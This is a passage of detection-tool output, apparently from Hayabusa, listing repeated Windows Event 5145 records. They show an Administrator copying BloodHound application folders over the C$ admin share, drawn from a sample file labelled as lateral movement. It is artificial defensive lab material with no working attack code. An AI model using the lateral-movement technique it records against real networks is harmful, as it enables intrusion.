Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 